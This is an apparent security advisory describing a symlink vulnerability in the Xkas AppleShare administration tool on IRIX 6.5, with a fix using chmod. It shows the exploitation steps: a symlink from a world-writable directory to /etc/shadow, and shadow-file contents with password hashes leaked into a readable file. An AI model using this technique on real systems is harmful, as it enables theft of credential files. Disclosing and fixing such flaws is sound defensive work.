COMMAND

	Xkas symlink vulnerability

SYSTEMS AFFECTED

	Irix 6.5

PROBLEM

	Kim Yong-Jun from HackersLab [http://www.hackerslab.org] says :
	

	Xkas is a server administration tool  for  appleshare.  Misconfiguration
	by the user with the root privilege could lead  to  a  serious  security
	vulnerability.
	

	.HSResource directory  and  .HSicon  file  is  created  when  sharing  a
	directory. Creation of the HSicon file is accomplished  by  copying  the
	/var/adm/appletalk/icons/VOLICON file.  A  problem  occurs  during  this
	process because the permission of /var/adm/appletalk/icons directory  is
	set to 777 (world-writeable). Link the wanted  file  with  VOLICON  like
	the following.
	

	$ ls -al /var/adm/appletalk/icons

	total 8

	drwxrwxrwx    4 root     sys           57 Jan 25 03:12 .

	drwxr-xr-x    6 root     sys         4096 Jan 24 16:05 ..

	drwxr-xr-x    2 root  sys           9 Jan 25 03:12 .HSResource

	lrwxr-xr-x    1 loveyou  user          11 Jan 25 03:05 VOLICON -> /etc/shadow

	

	When the administrator uses  the  /usr/etc/appletalk/xkas  directory  to
	share the root  directory, the following files are created in the root.
	

	$ ls -al /

	total 17099

	drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 .

	drwxr-xr-x   37 root     sys          4096 Jan 25 03:30 ..

	drwxr-xr-x    2 root     sys             9 Jan 25 03:30 .HSResource

	-rw-r--r--    1 root     sys           786 Jan 25 03:30 .HSicon  

	(etc..)

	

	$ cat /.HSicon

	root:y7floveyous30I:10908::::::

	bin:yxaiFduxixe8s:11127::::::

	uucp:*:11127::::::

	sys:*:11127::::::

	adm:*:11127::::::

	loveyou:mXaa2jxi/ejY:10877::::::

	

SOLUTION

	Remove other-write permission, contact your vendor and get a patch.
	

	$ su -

	# chmod o-w /var/adm/appletalk/icons